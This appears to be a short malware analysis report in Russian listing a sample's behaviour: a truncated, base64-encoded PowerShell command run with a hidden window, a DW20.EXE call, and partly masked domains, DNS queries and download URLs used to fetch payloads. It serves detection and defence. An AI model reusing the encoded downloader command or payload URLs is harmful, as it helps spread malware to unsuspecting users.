Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAG4ANABuADEAZABkAD0AJwBPAGgAdwB2AHAAeABmACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAGMAYABVAHIAaQBgAFQAWQBwAGAAUgBvAHQAYABPAGMAbwBMACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1520
- %TEMP%\625673.cvr
- 'pm###uetil.com':443
- 'x1.#.lencr.org':80
- 'vt###ebu.com':80
- 'vt###ebu.com':443
- http://x1.#.lencr.org/
- http://vt###ebu.com/wp-content/upgrade/qo_4f_q/
- http://vt###ebu.com/wp-content/upgrade/qo_4f_q
- 'pm###uetil.com':443
- 'vt###ebu.com':443
- DNS ASK pm###uetil.com
- DNS ASK x1.#.lencr.org
- DNS ASK hs###vling.com
- DNS ASK vt###ebu.com
- DNS ASK co####phongthan.com
- DNS ASK gl####ndelmaxima.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAG4ANABuADEAZABkAD0AJwBPAGgAdwB2AHAAeABmACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAGMAYABVAHIAaQBgAFQAWQBwAGAAUgBvAHQAYABPAGMAbwBMACIAIAA9AC... (со скрытым окном)